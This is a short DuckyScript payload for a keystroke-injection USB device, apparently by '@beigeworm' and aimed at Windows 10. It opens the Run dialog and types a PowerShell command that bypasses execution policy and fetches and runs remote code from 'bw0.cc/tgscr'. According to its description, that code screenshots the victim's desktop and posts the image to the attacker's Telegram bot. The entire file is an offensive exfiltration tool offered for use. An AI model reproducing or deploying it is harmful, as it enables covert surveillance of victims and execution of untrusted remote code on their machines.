21 lines
502 B
Plaintext
21 lines
502 B
Plaintext
|
|
REM Title: Screenshot to Telegram Bot Chat
|
|
REM Author: @beigeworm
|
|
REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat.
|
|
REM Target: Windows 10
|
|
|
|
REM *SETUP*
|
|
REM replace TELEGRAM_TOKEN_HERE with your Telegram Token.
|
|
|
|
REM some setup for dukie script
|
|
DEFAULT_DELAY 100
|
|
|
|
REM open powershell (remove "-W H" to show the window)
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C $tg='TELEGRAM_TOKEN_HERE'; iex (irm bw0.cc/tgscr)
|
|
ENTER
|
|
|
|
|